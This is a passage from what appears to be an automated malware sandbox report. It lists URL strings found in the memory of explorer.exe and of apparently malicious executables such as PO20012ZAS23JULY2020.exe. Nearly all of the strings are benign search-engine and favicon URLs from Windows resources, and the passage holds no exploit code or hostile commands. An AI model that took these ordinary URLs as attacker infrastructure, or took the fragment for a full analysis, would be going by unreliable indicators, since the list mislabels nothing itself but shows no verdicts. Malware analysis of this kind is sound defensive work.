server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: explorer.exe, 00000002.00000000.306948765.0000000013CB0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000002.00000000.306948765.0000000013CB0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000002.00000000.297836613.000000000EB40000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000002.00000000.306948765.0000000013CB0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000002.00000000.306948765.0000000013CB0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000002.00000000.281218129.0000000006000000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: PO20012ZAS23JULY2020.exe, 00000000.00000003.221804354.0000000000EFB000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: PO20012ZAS23JULY2020.exe, 00000000.00000003.221804354.0000000000EFB000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comn-u
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
